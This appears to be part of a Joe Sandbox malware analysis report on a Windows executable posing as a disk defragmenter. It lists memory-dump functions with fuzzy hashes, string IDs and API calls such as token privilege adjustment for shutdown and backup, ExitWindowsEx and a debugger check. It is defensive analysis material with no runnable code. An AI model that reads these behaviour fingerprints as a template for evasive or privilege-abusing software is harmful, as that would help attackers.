                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: PrivateProfileString$Find$ByteCloseFileFormatNextSize
                                                                                                                                                                                                                                                                                                • String ID: DefragTime$DefraggedFileCount$LG$TotalDefraggedFileSize$`=$main
                                                                                                                                                                                                                                                                                                • API String ID: 2174522762-3670384684
                                                                                                                                                                                                                                                                                                • Opcode ID: 32f377f5775842a14210629ecb5cba280cca974c36c24aed09cdb2c69e2afdbd
                                                                                                                                                                                                                                                                                                • Instruction ID: 01dd7cb33c618876df907d584398aa6540e784f12a7d1eb18dd06df18f62a64b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 32f377f5775842a14210629ecb5cba280cca974c36c24aed09cdb2c69e2afdbd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB516171204341AFE324DB21CD45FAF77E8AB88B04F10891EF54D972D1DA74A945CB6A
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                                                                                                                                                                                                                                                                                • API String ID: 0-225289630
                                                                                                                                                                                                                                                                                                • Opcode ID: c4eeff96e23f8423c76a4c32bafa8f1c0a88312c509c26e4c8bdaf889564b920
                                                                                                                                                                                                                                                                                                • Instruction ID: a1250dd2abae281965bcbcd99bbab5f3ca081c7f2ebc100e0f91383b9a449a5d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4eeff96e23f8423c76a4c32bafa8f1c0a88312c509c26e4c8bdaf889564b920
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F9122A2D052A88AF720C625EC04BEBB775EF95301F1881FAD40C67781D67E0EC68F52
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                                                                                                                                                                                                                                                                                • API String ID: 0-225289630
                                                                                                                                                                                                                                                                                                • Opcode ID: a85207eefa916ff92804396951960fcbea30f2298476b24e4c016fc00f141f77
                                                                                                                                                                                                                                                                                                • Instruction ID: 758bb074f1e02f5d219d83cb07dd28aa7128d3b2f90bd517896020da9daeb34d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a85207eefa916ff92804396951960fcbea30f2298476b24e4c016fc00f141f77
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 787135A2D096A88AF7218625EC047EBB775DF91301F0890F9D44CA7781D67E0FC68F26
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: JM<5$L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                                                                                                                                                                                                                • API String ID: 0-2011736602
                                                                                                                                                                                                                                                                                                • Opcode ID: c598ec1c7b20de3c6fa01b0c0dd02dd9d8603e73820023a0ec984d0c6b1ad772
                                                                                                                                                                                                                                                                                                • Instruction ID: 63136df9b4e2b9ab88fafee4aab420784887feb0363108930222d5ca6ea7e0ef
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c598ec1c7b20de3c6fa01b0c0dd02dd9d8603e73820023a0ec984d0c6b1ad772
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A92211B1D046698AFB208B24DC40BEAB7B5FF84310F1481FAD80DA7681D6784FC28F56
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: E$P$P32@$c$e$i$o$r$s$s$t$x
                                                                                                                                                                                                                                                                                                • API String ID: 0-2269684116
                                                                                                                                                                                                                                                                                                • Opcode ID: 93efda853aae18ac3b24485165a57be69ad564f2791e1e021dd8550b08ca92a7
                                                                                                                                                                                                                                                                                                • Instruction ID: 566fded381b5c44124f86d85541a2f214abba5eb8d90c512736025a7e78c9a4c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 93efda853aae18ac3b24485165a57be69ad564f2791e1e021dd8550b08ca92a7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DAD15BB2D082189AF7248A24DC94BFB7675EF94310F0881FAD44D97780D67E0FC58B66
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: E$P$P32@$c$e$i$o$r$s$s$t$x
                                                                                                                                                                                                                                                                                                • API String ID: 0-2269684116
                                                                                                                                                                                                                                                                                                • Opcode ID: d1022c59ea0b9a5d9822464d441f60f24f82c4066ffcf43c3b8c3142c8d63b51
                                                                                                                                                                                                                                                                                                • Instruction ID: 1b04957f8641a02fe2ad15b2e7decd8342e4988316b47231fcf7e75471d053ba
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d1022c59ea0b9a5d9822464d441f60f24f82c4066ffcf43c3b8c3142c8d63b51
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05A199A2D182549AF7208A24DC50BFB6679EF94310F0881FED54D976C0E67F0FC58B6A
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: E$P$P32@$c$e$i$o$r$s$s$t$x
                                                                                                                                                                                                                                                                                                • API String ID: 0-2269684116
                                                                                                                                                                                                                                                                                                • Opcode ID: 67708232c783caed01210743f30500afd73b8ffc04a3e19dad3ec982a8eb5999
                                                                                                                                                                                                                                                                                                • Instruction ID: 188e51f99b3aa9ddec7d557129ce05f34de3fbb78c9ae6bc7f213ff74b940b60
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 67708232c783caed01210743f30500afd73b8ffc04a3e19dad3ec982a8eb5999
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4A178A2D182549AF7208A24DC547FB6679EF94300F0881FED54D976C0E67F0FC58B2A
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                                                                                                                                                                                                                • API String ID: 0-4069139063
                                                                                                                                                                                                                                                                                                • Opcode ID: e57262210f101982aebc67fa1531e66537634e29451887fb22e68237d303f820
                                                                                                                                                                                                                                                                                                • Instruction ID: 39e3235dacd0361428d296b9665e6c4f4b05e32631fe48d7877cc75e529ec4ca
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e57262210f101982aebc67fa1531e66537634e29451887fb22e68237d303f820
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CAA1C3A1D082A88AF7208B25DC447EABBB5FF55300F1480FAD44DA7281E3794EC6CF56
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                                                                                                                                                                                                                • API String ID: 0-4069139063
                                                                                                                                                                                                                                                                                                • Opcode ID: 8f512cef653570cbc9933f7ad1ee454ac54dce2b8e3aeade901f6980a8e4d110
                                                                                                                                                                                                                                                                                                • Instruction ID: e01e6551614943d30b2615baf5558eae676ad52589e069668acb98131b3f94d1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f512cef653570cbc9933f7ad1ee454ac54dce2b8e3aeade901f6980a8e4d110
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0091C3A1D082A88AF7208B25DC407DABBB5FF55304F1480EAD48DA7241E3794ED6CF56
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,00421955), ref: 00419D9A
                                                                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,00421955), ref: 00419DA1
                                                                                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00419DB7
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00421955), ref: 00419DC6
                                                                                                                                                                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32 ref: 00419E04
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00419E13
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00419E24
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseHandle$ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                                                                                • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                                                                • API String ID: 1280518032-3733053543
                                                                                                                                                                                                                                                                                                • Opcode ID: da0e7d1861009587fb01dbe4e0b9d2093fea7a0ac8dcd4d1a170a0e53db07ebf
                                                                                                                                                                                                                                                                                                • Instruction ID: d07024e087d9fbb4da489035f39631b0ffcbbc48e9dced30be6a628d6d85d024
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: da0e7d1861009587fb01dbe4e0b9d2093fea7a0ac8dcd4d1a170a0e53db07ebf
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D91130B5208300ABD314DFA4DC89B5B77E4BB88B00F80882CF54DC6290E778D8C48B5A
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: $>
                                                                                                                                                                                                                                                                                                • API String ID: 0-4162622711
                                                                                                                                                                                                                                                                                                • Opcode ID: 92d9eede98623f53117d376c72bc09aac5265e67f7db331a73714669efe9eeb3
                                                                                                                                                                                                                                                                                                • Instruction ID: ab613082dd5abe8ce957bb114a2766d0e8ed38c9df93d9e2be8208bb24206897
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92d9eede98623f53117d376c72bc09aac5265e67f7db331a73714669efe9eeb3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5432C1705087419BC339DF24C950BEBB7E5FF99300F04492EE99A872A0E7789945CB5B
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,00421972), ref: 0041E100
                                                                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,00421972), ref: 0041E107
                                                                                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041E124
                                                                                                                                                                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32 ref: 0041E148
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0041E14E
                                                                                                                                                                                                                                                                                                • ExitWindowsEx.USER32(00000001,80020003), ref: 0041E16E
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                                                                                                                                                • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                                                                • API String ID: 107509674-3733053543
                                                                                                                                                                                                                                                                                                • Opcode ID: b491cb2bc98087b98b93889b4cab252affd35304ae06bf2e3e34bcfb05d76a30
                                                                                                                                                                                                                                                                                                • Instruction ID: ff8bdaaac48f1339d689247c0ac3bb4d0c15d19762690cb1fcb66aa4c131ddab
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b491cb2bc98087b98b93889b4cab252affd35304ae06bf2e3e34bcfb05d76a30
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7301FC35644310BFE3109BA8DC49B9B7698BB44B04F40482DFD4DE6191D77499408BDA
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?,?,?), ref: 0045A8C2
                                                                                                                                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 0045A915
                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?), ref: 0045A955
                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000,?,00000000,00000000,00000001,?,?,?), ref: 0045A9AA
                                                                                                                                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 0045A9CE
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DiskFreeSpace$Find$CloseFileFirst
                                                                                                                                                                                                                                                                                                • String ID: %c:\
                                                                                                                                                                                                                                                                                                • API String ID: 281833627-3142399695
                                                                                                                                                                                                                                                                                                • Opcode ID: 451e843c757d912e0df44721ece3a0365b6d60f66d903087e08b2b682d24d5dc
                                                                                                                                                                                                                                                                                                • Instruction ID: 5c1349d2b4a299dbbed6192556f5b370b8187b703f81d55d5c722b9a40b8fb44
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 451e843c757d912e0df44721ece3a0365b6d60f66d903087e08b2b682d24d5dc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A071FBB55057019FD314DF64D988BABB7E4FF98711F008A2EE89A87390E734A848CF56
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • IsIconic.USER32(?), ref: 0041F916
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000027,?,00000000), ref: 0041F937
                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(0000000B), ref: 0041F945
                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(0000000C), ref: 0041F94B
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0041F958
                                                                                                                                                                                                                                                                                                • DrawIcon.USER32(?,?,?,?), ref: 0041F989
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MetricsSystem$ClientDrawIconIconicMessageRectSend
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2166663075-0
                                                                                                                                                                                                                                                                                                • Opcode ID: cb24d554b556fdc8d671f57bd367dd0002cc258e733202bd551999ba64437650
                                                                                                                                                                                                                                                                                                • Instruction ID: c07e6ffc6c3a7e6482c06200d306031f545548e1037b46c62c472d77c4aae73d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cb24d554b556fdc8d671f57bd367dd0002cc258e733202bd551999ba64437650
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE3158712086019FD324DF38C989BABB7E8FB88710F144A2EE19A93290DB74E845CB55
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00020028,?,?,?,?,?,?,?,0041A0B9,SeBackupPrivilege), ref: 00419CFD
                                                                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,0041A0B9,SeBackupPrivilege), ref: 00419D04
                                                                                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00419D1E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Process$CurrentLookupOpenPrivilegeTokenValue
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3639550587-0
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,00000003,?), ref: 0046326C
                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,00000003,?), ref: 00463410
                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(?), ref: 0046342D
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                                                                                • String ID: %s%s\$%s*
                                                                                                                                                                                                                                                                                                • API String ID: 3541575487-790581550
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 00473B49
                                                                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00473B5E
                                                                                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(0047CF54), ref: 00473B69
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 00473B85
                                                                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00473B8C
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2579439406-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 5ae23ef8c9597736f524d82b530ad1912cf66df142059fb024dfe3cae4b4f3e6
                                                                                                                                                                                                                                                                                                • Instruction ID: 5fbb9a2fc2dc4524adccc28e56c0de5744acadb4307870d4d3e04b8eaaabc2f4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ae23ef8c9597736f524d82b530ad1912cf66df142059fb024dfe3cae4b4f3e6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E421E3B8828204DFC700DFA5FC856853BA4FB28329F5040BBE80D87762E77466848F5D
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32 ref: 0041C29B
                                                                                                                                                                                                                                                                                                • SHFormatDateTimeW.SHLWAPI(?,00000002,00000000), ref: 0041C2C8
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Time$DateFileFormatSystem
                                                                                                                                                                                                                                                                                                • String ID: DiskDefrag\AutoDefragmention$LastDefragmention
                                                                                                                                                                                                                                                                                                • API String ID: 750415452-3598614746
                                                                                                                                                                                                                                                                                                • Opcode ID: e82a9422a2e71e94cea5bec6a8f095e47c1f013a3b59e1dfa3399cdb80a3d87a
                                                                                                                                                                                                                                                                                                • Instruction ID: a0b1e6286b276bc7d887fd98d5a7f5957222b11053583dbd66c01ec11ac0fb83
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e82a9422a2e71e94cea5bec6a8f095e47c1f013a3b59e1dfa3399cdb80a3d87a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E4115276508701DFD300EF54DD85B9A7BE4FB48720F404A2EF156C22E1EB74A548CB56
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(?,00415169), ref: 004150B0
                                                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 004150C1
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,ImageList_Draw), ref: 004150DB
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                                • String ID: ImageList_Draw
                                                                                                                                                                                                                                                                                                • API String ID: 310444273-2074868843
                                                                                                                                                                                                                                                                                                • Opcode ID: c2548a7b991ba7467d3f124a8d35b83a44c462a32142ecac1e07a96c10e5a41a
                                                                                                                                                                                                                                                                                                • Instruction ID: 64c332f81b35f2aaac3873e7666c404af8577304093a8f0924de00557a4645c6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2548a7b991ba7467d3f124a8d35b83a44c462a32142ecac1e07a96c10e5a41a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62F0D474601B01CFD7608FA9D988A43BBE4BB58715B50C82EE59AC3A00D778F480CF04
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: 8$n$n$x
                                                                                                                                                                                                                                                                                                • API String ID: 0-2129689772
                                                                                                                                                                                                                                                                                                • Opcode ID: 3fc8ab0f70becb41a8c13356cb3e750a753a9f6ad6fc52484c3dafb684aa1eae
                                                                                                                                                                                                                                                                                                • Instruction ID: 4153cc9e9f9399db15846b8c3dde14c84802a132ab10d275a38415ff115d4298
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3fc8ab0f70becb41a8c13356cb3e750a753a9f6ad6fc52484c3dafb684aa1eae
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F81215B3C012155FF728CA24DD9AAEEBB79EB90304F0581BAE80D66284D77D5BC5CE41
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: 8$n$n$x
